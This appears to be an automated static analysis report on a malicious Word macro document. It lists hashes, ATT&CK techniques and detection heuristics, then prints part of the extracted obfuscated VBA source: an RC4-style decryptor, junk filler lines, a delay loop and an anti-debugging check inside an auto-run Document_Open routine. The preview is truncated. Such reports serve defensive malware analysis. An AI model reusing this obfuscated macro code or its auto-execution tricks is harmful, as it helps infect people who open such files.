Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 52a03b00bf052ea3…

MALICIOUS

Office (OLE)

Size: 161.5 KB
Created: 2016-02-03 15:48:00
Authoring application: Microsoft Office Word
First seen: 2017-11-29
MD5: e74867259dd754d2321bbfbfab6b8ad7
SHA-1: a1b0e1924b8329890a4bac0d66368dad22fb0f3b
SHA-256: 52a03b00bf052ea3d5966bd5a02ccc77dafdafa7d3a2e6f4e82def1bf04b503c
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros, specifically a Document_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection 'Doc.Trojan.Agent-1383194' further supports its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Trojan.Agent-1383194 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Agent-1383194
  • VBA macros detected (severity: medium; 3 related findings; rule: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical; rule: OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro (severity: high; rule: OLE_VBA_DOCOPEN)
    Document_Open macro
  • VBA p-code auto-exec with execution tokens (severity: high; rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 81974 bytes
SHA-256: bf4295b2ce7e59bcd0268351a48a8e2b977357936fc67c319ac851512b557dbb
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim JfivWS9SZ7WoqhDd(1964) As Long
Function KJweeS3op7841P8E(SER7vxeZYI0Q() As Byte, ByVal Xs4I3V9EABN6EK As String) As String
On Error Resume Next
Dim TQAQPZSYFYsmuf(0 To 255) As Integer, Qw5H2DwqC3hL2g As Long, TS07fruhrS As Long, Uob3No4WhlZ As Long, A00KNrQsV As Byte, UkG22() As Byte, Gf91c() As Byte
ReDim UkG22(UBound(SER7vxeZYI0Q)) As Byte
UkG22 = SER7vxeZYI0Q
Gf91c = StrConv(Xs4I3V9EABN6EK, (32 + 152 + 32 - 152 + 32 + 152 + 32 - 152))
For Qw5H2DwqC3hL2g = 0 To (64 + 105 + 64 - 105 + 64 + 105 + 64 - 105 - 1)
TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = Qw5H2DwqC3hL2g
Next Qw5H2DwqC3hL2g
Qw5H2DwqC3hL2g = 0
TS07fruhrS = 0
Uob3No4WhlZ = 0
For Qw5H2DwqC3hL2g = 0 To (64 + 621 + 64 - 621 + 64 + 621 + 64 - 621 - 1)
TS07fruhrS = (TS07fruhrS + TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) + Gf91c(Qw5H2DwqC3hL2g Mod Len(Xs4I3V9EABN6EK))) Mod ((64 + 600 + 64 - 600 + 64 + 600 + 64 - 600))
A00KNrQsV = TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g)
TQAQPZSYFYsmuf(Qw5H2DwqC3hL2g) = TQAQPZSYFYsmuf(TS07fruhrS)
TQAQPZSYFYsmuf(TS07fruhrS) = A00KNrQsV
Next Qw5H2DwqC3hL2g
Qw5H2DwqC3hL2g = 0
TS07fruhrS = 0
Uob3No4WhlZ = 0
For Qw5H2DwqC3hL2g = 0 To UBound(SER7vxeZYI0Q)
TS07fruhrS = (TS07fruhrS + 1) Mod 256
Uob3No4WhlZ = (Uob3No4WhlZ + TQAQPZSYFYsmuf(TS07fruhrS)) Mod 256
A00KNrQsV = TQAQPZSYFYsmuf(TS07fruhrS)
TQAQPZSYFYsmuf(TS07fruhrS) = TQAQPZSYFYsmuf(Uob3No4WhlZ)
TQAQPZSYFYsmuf(Uob3No4WhlZ) = A00KNrQsV
UkG22(Qw5H2DwqC3hL2g) = U98MGIgy41PxtG(UkG22(Qw5H2DwqC3hL2g), (TQAQPZSYFYsmuf((TQAQPZSYFYsmuf(TS07fruhrS) + TQAQPZSYFYsmuf(Uob3No4WhlZ)) Mod ((64 + 408 + 64 - 408 + 64 + 408 + 64 - 408)))))
Next Qw5H2DwqC3hL2g
KJweeS3op7841P8E = StrConv(UkG22, (16 + 412 + 16 - 412 + 16 + 412 + 16 - 412))
End Function
Function U98MGIgy41PxtG(Ofw3MR, VGqhXSqhj)
WZHwd = Year(Now) '26
U98MGIgy41PxtG = (Ofw3MR And Not VGqhXSqhj) Or (Not Ofw3MR And VGqhXSqhj)
XfMSsOftg = Year(Now) '51
End Function
Function X6kwgMbNgJ(Ak1HZBnpV As Integer) As Boolean
CMeq1Qt4lApz = Year(Now) '48
Static Ci2s21H7C As Byte
CY23LTC1bd = Year(Now) '82
Ci2s21H7C = Ci2s21H7C + 1
QTs = Year(Now) '87
If Ci2s21H7C = 1 Then Debug.Assert Not X6kwgMbNgJ(39)
MEa5IA2DpUk = Year(Now) '60
X6kwgMbNgJ = Ci2s21H7C = 0
OKHIljrqVgp = Year(Now) '98
Ci2s21H7C = 0
I8LqdGeSl = Year(Now) '89
End Function
Sub DoYYO2UPaL()
YIDVntj3YK2wc = Year(Now) '46
If CDbl(94) = True Then GQaj8PEg = 67
DatePart "EUppxcBiHgB", 75
Log 25
Month 75
FreeFile 96
App.StartLogging "Ct9JP3HTB7K", 85
Err.Clear
DoEvents
BWELN = LCase(21)
IsError 15
MEdt75AApXXWLZ = Year(Now) '67
End Sub
Sub Document_Open()
JaqGPwoPu48YczqN = Year(Now) '37
On Error Resume Next
LWb9ZjskfwlJHS = Year(Now) '74
Dim Ds1jSlIYao5X As Long, RDr2Y As Long, HP85djOxI8AGedne As Long
BzvbUy = Year(Now) '44
Ds1jSlIYao5X = 93364438: RDr2Y = 0: HP85djOxI8AGedne = 0
IonXs47akeQMk = Year(Now) '35
For RDr2Y = 1 To Ds1jSlIYao5X
HP85djOxI8AGedne = HP85djOxI8AGedne + 1
Next RDr2Y
Xt0UUX5QcqO3Ns = Year(Now) '48
If HP85djOxI8AGedne = Ds1jSlIYao5X Then
CP7eYRX89Nn = Year(Now) '23
Dim VoF1MHx9 As Integer, PA2YVLe As String
For VoF1MHx9 = 4 To 426
PA2YVLe = PA2YVLe + VoF1MHx9
Next
Rv1KdBVm1X = Year(Now) '58
If (13.5 + 30 + 13.5 - 30 + 13.5 + 30 + 13.5 - 30 - 1) = (13.5 + 325 + 13.5 - 325 + 13.5 + 325 + 13.5 - 325 - 1) Then
DviWOuB = Year(Now) '48
VVkBYsJicw2DlUAmV = Year(Now) '23
If X6kwgMbNgJ(15) = True Then
YLArIfSr = Year(Now) '14
HDjs9On9a9Y
KwIdzptJqryh = Year(Now) '58
Else
Ia5y06lXt1Vs = Year(Now) '86
DoYYO2UPaL
NMpb0m = Year(Now) '26
End If
Else
DVHXbu3ZcQAc = Year(Now) '8
DoYYO2UPaL
HYGDr = Year(Now) '71
End If
PgeRSvr6icpl = Year(Now) '87
Else
KCxZonr18oR = Year(Now) '1
DoYYO2UPaL
DcDipOwiUXXXD4 = Year(Now) '29
End If
ReCn7 = Year(Now) '87
End Sub
Function Ya3FssyIa(ByVal Rpwp7G0fmiW As Variant) As Long
YxoXhe8cWBdV1F = 
... (truncated)